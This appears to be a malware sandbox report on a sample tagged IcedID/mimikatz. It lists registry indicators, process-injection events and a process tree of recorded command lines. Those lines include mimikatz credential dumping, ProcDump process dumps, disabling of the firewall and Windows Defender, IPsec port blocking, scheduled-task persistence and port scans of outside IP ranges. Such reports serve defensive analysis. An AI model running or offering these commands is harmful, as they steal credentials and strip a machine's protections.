Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | euikgtl.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | euikgtl.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | euikgtl.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | euikgtl.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | euikgtl.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | jgqtbilab.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | jgqtbilab.exe

Modifies registry class 14 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | euikgtl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | euikgtl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | euikgtl.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
3752 | euikgtl.exe (×64)

Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid | process
660 | (not recorded) (×15)

Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid | process
2808 | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe, euikgtl.exe, vfshost.exe, jgqtbilab.exe, cktkgb.exe
description | pid | process
- Token: SeDebugPrivilege | 2808 | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
- Token: SeDebugPrivilege | 852 | euikgtl.exe
- Token: SeDebugPrivilege | 3752 | euikgtl.exe
- Token: SeDebugPrivilege | 2552 | vfshost.exe
- Token: SeDebugPrivilege | 1856 | jgqtbilab.exe
- Token: SeLockMemoryPrivilege | 4524 | cktkgb.exe
- Token: SeLockMemoryPrivilege | 4524 | cktkgb.exe
- Token: SeDebugPrivilege | 3808 | jgqtbilab.exe
- Token: SeDebugPrivilege | 1616 | jgqtbilab.exe
- Token: SeDebugPrivilege | 1656 | jgqtbilab.exe
- Token: SeDebugPrivilege | 4796 | jgqtbilab.exe
- Token: SeDebugPrivilege | 3600 | jgqtbilab.exe
- Token: SeDebugPrivilege | 1692 | jgqtbilab.exe
- Token: SeDebugPrivilege | 2728 | jgqtbilab.exe
- Token: SeDebugPrivilege | 2244 | jgqtbilab.exe
- Token: SeDebugPrivilege | 3316 | jgqtbilab.exe
- Token: SeDebugPrivilege | 3216 | jgqtbilab.exe
- Token: SeDebugPrivilege | 4472 | jgqtbilab.exe
- Token: SeDebugPrivilege | 4348 | jgqtbilab.exe
- Token: SeDebugPrivilege | 3724 | jgqtbilab.exe
- Token: SeDebugPrivilege | 3800 | jgqtbilab.exe
- Token: SeDebugPrivilege | 1996 | jgqtbilab.exe
- Token: SeDebugPrivilege | 2316 | jgqtbilab.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe, euikgtl.exe, xohudmc.exe, fkjvgk.exe
pid | process
- 2808 | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe (2 IoCs)
- 852 | euikgtl.exe (2 IoCs)
- 3752 | euikgtl.exe (2 IoCs)
- 3480 | xohudmc.exe (1 IoC)
- 3620 | fkjvgk.exe (1 IoC)
- 3444 | euikgtl.exe (2 IoCs)
- 232 | euikgtl.exe (2 IoCs)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe, cmd.exe, euikgtl.exe, wpcap.exe, net.exe
description | pid | process | target process (each pair below is recorded three times unless noted; 21 x 3 + 1 = 64 IoCs)
- PID 2808 wrote to memory of 4324 | 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe -> cmd.exe
- PID 4324 wrote to memory of 3032 | cmd.exe -> PING.EXE
- PID 4324 wrote to memory of 852 | cmd.exe -> euikgtl.exe
- PID 3752 wrote to memory of 2356 | euikgtl.exe -> cmd.exe
- PID 2356 wrote to memory of 4188 | cmd.exe -> cmd.exe
- PID 2356 wrote to memory of 4436 | cmd.exe -> cacls.exe
- PID 2356 wrote to memory of 2012 | cmd.exe -> cmd.exe
- PID 2356 wrote to memory of 4628 | cmd.exe -> cacls.exe
- PID 3752 wrote to memory of 4852 | euikgtl.exe -> netsh.exe
- PID 3752 wrote to memory of 3464 | euikgtl.exe -> netsh.exe
- PID 2356 wrote to memory of 2224 | cmd.exe -> cmd.exe
- PID 2356 wrote to memory of 3160 | cmd.exe -> cacls.exe
- PID 3752 wrote to memory of 2456 | euikgtl.exe -> netsh.exe
- PID 3752 wrote to memory of 1824 | euikgtl.exe -> cmd.exe
- PID 1824 wrote to memory of 4536 | cmd.exe -> wpcap.exe
- PID 4536 wrote to memory of 4620 | wpcap.exe -> net.exe
- PID 4620 wrote to memory of 1872 | net.exe -> net1.exe
- PID 4536 wrote to memory of 4716 | wpcap.exe -> net.exe
- PID 4716 wrote to memory of 3592 | net.exe -> net1.exe
- PID 4536 wrote to memory of 4784 | wpcap.exe -> net.exe
- PID 4784 wrote to memory of 4348 | net.exe -> net1.exe
- PID 4536 wrote to memory of 2640 | wpcap.exe -> net.exe (recorded once; the 64-IoC listing is cut off here)
Processes
(Each entry: image path (tree level, PID), then the command line and the signatures attributed to that process. Indentation shows the parent/child relationship.)

C:\Windows\System32\spoolsv.exe (level 1, PID 2204)
    cmdline: C:\Windows\System32\spoolsv.exe
    C:\Windows\TEMP\tskqpisje\cktkgb.exe (level 2, PID 4524)
        cmdline: "C:\Windows\TEMP\tskqpisje\cktkgb.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    (cktkgb.exe appears under spoolsv.exe because euikgtl.exe (PID 3752) created it with a spoofed parent; see "Suspicious use of NtCreateUserProcessOtherParentProcess" above.)

C:\Users\Admin\AppData\Local\Temp\2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe (level 1, PID 2808)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe"
    - Drops file in Windows directory
    - Suspicious behavior: RenamesItself
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 4324)
        cmdline: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\itspapsg\euikgtl.exe
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\PING.EXE (level 3, PID 3032)
            cmdline: ping 127.0.0.1 -n 5
            - Runs ping.exe
        C:\Windows\itspapsg\euikgtl.exe (level 3, PID 852)
            cmdline: C:\Windows\itspapsg\euikgtl.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx

C:\Windows\itspapsg\euikgtl.exe (level 1, PID 3752)
    cmdline: C:\Windows\itspapsg\euikgtl.exe
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Sets file execution options in registry
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2356)
        cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 4188)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 4436)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 2012)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 4628)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 2224)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 3160)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 4852)
        cmdline: netsh ipsec static del all
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 3464)
        cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 2456)
        cmdline: netsh ipsec static add filteraction name=BastardsList action=block
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 1824)
        cmdline: cmd /c C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S
        - Suspicious use of WriteProcessMemory
        C:\Windows\lubbeisit\abkgigiey\wpcap.exe (level 3, PID 4536)
            cmdline: C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Drops file in Program Files directory
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net.exe (level 4, PID 4620)
                cmdline: net stop "Boundary Meter"
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe (level 5, PID 1872)
                    cmdline: C:\Windows\system32\net1 stop "Boundary Meter"
            C:\Windows\SysWOW64\net.exe (level 4, PID 4716)
                cmdline: net stop "TrueSight Meter"
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe (level 5, PID 3592)
                    cmdline: C:\Windows\system32\net1 stop "TrueSight Meter"
            C:\Windows\SysWOW64\net.exe (level 4, PID 4784)
                cmdline: net stop npf
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\net1.exe (level 5, PID 4348)
                    cmdline: C:\Windows\system32\net1 stop npf
            C:\Windows\SysWOW64\net.exe (level 4, PID 2640)
                cmdline: net start npf
                C:\Windows\SysWOW64\net1.exe (level 5, PID 388)
                    cmdline: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 1616)
        cmdline: cmd /c net start npf
        C:\Windows\SysWOW64\net.exe (level 3, PID 4484)
            cmdline: net start npf
            C:\Windows\SysWOW64\net1.exe (level 4, PID 4676)
                cmdline: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 1208)
        cmdline: cmd /c net start npf
        C:\Windows\SysWOW64\net.exe (level 3, PID 2848)
            cmdline: net start npf
            C:\Windows\SysWOW64\net1.exe (level 4, PID 2436)
                cmdline: C:\Windows\system32\net1 start npf
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 1492)
        cmdline: cmd /c C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt
        C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe (level 3, PID 4032)
            cmdline: C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt
            - Executes dropped EXE
            - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 3528)
        cmdline: cmd /c C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lubbeisit\Corporate\log.txt
        - Drops file in Windows directory
        C:\Windows\lubbeisit\Corporate\vfshost.exe (level 3, PID 2552)
            cmdline: C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 4084)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 2856)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe (level 3, PID 4496)
            cmdline: schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"
            - Creates scheduled task(s)
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 4952)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 2692)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe (level 3, PID 2528)
            cmdline: schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"
            - Creates scheduled task(s)
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 5016)
        cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 4500)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\schtasks.exe (level 3, PID 2732)
            cmdline: schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"
            - Creates scheduled task(s)
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 2456)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 2560)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 2720)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 1312)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 4288)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 3880)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 5116)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 1952)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 4452)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 2420)
        cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 5048)
        cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    C:\Windows\SysWOW64\netsh.exe (level 2, PID 872)
        cmdline: netsh ipsec static set policy name=Bastards assign=y
    (Net effect of the IPsec commands: inbound TCP and UDP to ports 135, 139 and 445 on the infected host are blocked, which locks out other actors using the same entry vector while the firewall itself is being disabled below.)
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 3824)
        cmdline: cmd /c net stop SharedAccess
        C:\Windows\SysWOW64\net.exe (level 3, PID 4100)
            cmdline: net stop SharedAccess
            C:\Windows\SysWOW64\net1.exe (level 4, PID 1812)
                cmdline: C:\Windows\system32\net1 stop SharedAccess
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 216)
        cmdline: cmd /c netsh firewall set opmode mode=disable
        C:\Windows\SysWOW64\netsh.exe (level 3, PID 852)
            cmdline: netsh firewall set opmode mode=disable
            - Modifies Windows Firewall
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2676)
        cmdline: cmd /c netsh Advfirewall set allprofiles state off
        C:\Windows\SysWOW64\netsh.exe (level 3, PID 2672)
            cmdline: netsh Advfirewall set allprofiles state off
            - Modifies Windows Firewall
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2508)
        cmdline: cmd /c net stop MpsSvc
        C:\Windows\SysWOW64\net.exe (level 3, PID 4108)
            cmdline: net stop MpsSvc
            C:\Windows\SysWOW64\net1.exe (level 4, PID 3316)
                cmdline: C:\Windows\system32\net1 stop MpsSvc
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2484)
        cmdline: cmd /c net stop WinDefend
        C:\Windows\SysWOW64\net.exe (level 3, PID 4936)
            cmdline: net stop WinDefend
            C:\Windows\SysWOW64\net1.exe (level 4, PID 3256)
                cmdline: C:\Windows\system32\net1 stop WinDefend
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2252)
        cmdline: cmd /c net stop wuauserv
        C:\Windows\SysWOW64\net.exe (level 3, PID 456)
            cmdline: net stop wuauserv
            C:\Windows\SysWOW64\net1.exe (level 4, PID 3852)
                cmdline: C:\Windows\system32\net1 stop wuauserv
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 3160)
        cmdline: cmd /c sc config MpsSvc start= disabled
        C:\Windows\SysWOW64\sc.exe (level 3, PID 4768)
            cmdline: sc config MpsSvc start= disabled
            - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 432)
        cmdline: cmd /c sc config SharedAccess start= disabled
        C:\Windows\SysWOW64\sc.exe (level 3, PID 4184)
            cmdline: sc config SharedAccess start= disabled
            - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2244)
        cmdline: cmd /c sc config WinDefend start= disabled
        C:\Windows\SysWOW64\sc.exe (level 3, PID 2832)
            cmdline: sc config WinDefend start= disabled
            - Launches sc.exe
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 3648)
        cmdline: cmd /c sc config wuauserv start= disabled
        C:\Windows\SysWOW64\sc.exe (level 3, PID 1972)
            cmdline: sc config wuauserv start= disabled
            - Launches sc.exe
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 1856)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 776 C:\Windows\TEMP\lubbeisit\776.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\xohudmc.exe (level 2, PID 3480)
        cmdline: C:\Windows\TEMP\xohudmc.exe
        - Executes dropped EXE
        - Drops file in System32 directory
        - Suspicious use of SetWindowsHookEx
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3808)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 60 C:\Windows\TEMP\lubbeisit\60.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 1616)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2204 C:\Windows\TEMP\lubbeisit\2204.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 1656)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2564 C:\Windows\TEMP\lubbeisit\2564.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 4796)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2760 C:\Windows\TEMP\lubbeisit\2760.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3600)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2920 C:\Windows\TEMP\lubbeisit\2920.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 1692)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3108 C:\Windows\TEMP\lubbeisit\3108.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 2728)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3856 C:\Windows\TEMP\lubbeisit\3856.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 2244)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 3944 C:\Windows\TEMP\lubbeisit\3944.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3316)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4008 C:\Windows\TEMP\lubbeisit\4008.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3216)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2908 C:\Windows\TEMP\lubbeisit\2908.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 4472)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 1128 C:\Windows\TEMP\lubbeisit\1128.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 4348)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4044 C:\Windows\TEMP\lubbeisit\4044.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3724)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2576 C:\Windows\TEMP\lubbeisit\2576.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 3800)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2944 C:\Windows\TEMP\lubbeisit\2944.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 1996)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2504 C:\Windows\TEMP\lubbeisit\2504.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\TEMP\lubbeisit\jgqtbilab.exe (level 2, PID 2316)
        cmdline: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 4904 C:\Windows\TEMP\lubbeisit\4904.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    (jgqtbilab.exe is run 17 times with the Sysinternals ProcDump syntax -accepteula -mp <pid> <pid>.dmp, writing a dump of each target process to C:\Windows\TEMP\lubbeisit\. One of the targets, PID 2204, is the spoolsv.exe at the top of this tree.)
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2960)
        cmdline: cmd.exe /c C:\Windows\lubbeisit\abkgigiey\scan.bat
        C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exe (level 3, PID 1452)
            cmdline: nstjgbafp.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
            - Executes dropped EXE
            - Drops file in Windows directory
    C:\Windows\SysWOW64\cmd.exe (level 2, PID 2848)
        cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        C:\Windows\SysWOW64\cmd.exe (level 3, PID 3240)
            cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        C:\Windows\SysWOW64\cacls.exe (level 3, PID 4312)
            cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
